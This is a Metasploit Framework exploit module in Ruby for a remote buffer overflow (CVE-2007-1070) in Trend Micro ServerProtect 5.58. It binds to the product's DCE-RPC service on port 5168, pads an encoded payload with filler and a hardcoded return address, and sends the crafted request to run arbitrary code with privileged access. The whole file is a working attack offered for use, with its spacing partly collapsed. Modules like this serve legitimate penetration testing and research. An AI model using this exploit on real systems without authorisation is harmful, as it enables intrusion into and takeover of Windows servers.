### $Id: trendmicro_serverprotect.rb 9179 2010-04-30 08:40:19Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require'msf/core'classMetasploit3<Msf::Exploit::RemoteRank=GoodRanking
include Msf::Exploit::Remote::DCERPCdefinitialize(info ={})super(update_info(info,'Name'=>'Trend Micro ServerProtect 5.58 Buffer Overflow','Description'=>%q{
This module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.
By sending a specially crafted RPC request, an attacker could overflow the
buffer and execute arbitrary code.
},'Author'=>['MC'],'License'=>MSF_LICENSE,'Version'=>'$Revision: 9179 $','References'=>[['CVE','2007-1070'],['OSVDB','33042'],['BID','22639'],],'Privileged'=>true,'DefaultOptions'=>{'EXITFUNC'=>'thread',},'Payload'=>{'Space'=>800,'BadChars'=>"\x00",'PrependEncoder'=>"\x81\xc4\xff\xef\xff\xff\x44",},'Platform'=>'win','Targets'=>[['Trend Micro ServerProtect 5.58 Build 1060',{'Ret'=>0x6563124c}],# CALL EBX - StCommon.dll],'DefaultTarget'=>0,'DisclosureDate'=>'Feb 20 2007'))register_options([Opt::RPORT(5168)],self.class)enddef exploit
connect
handle =dcerpc_handle('25288888-bd5b-11d1-9d53-0080c83a5c2c','1.0','ncacn_ip_tcp',[datastore['RPORT']])print_status("Binding to #{handle} ...")dcerpc_bind(handle)print_status("Bound to #{handle} ...")
filler = payload.encoded +rand_text_english(1600- payload.encoded.length)+[target.ret].pack('V')
len = filler.length
# CMON_NetTestConnection
sploit =NDR.long(0x000a0017)+NDR.long(len)+ filler +NDR.long(0)print_status("Trying target #{target.name}...")begindcerpc_call(0, sploit)rescueRex::Proto::DCERPC::Exceptions::NoResponseend
handler
disconnect
endend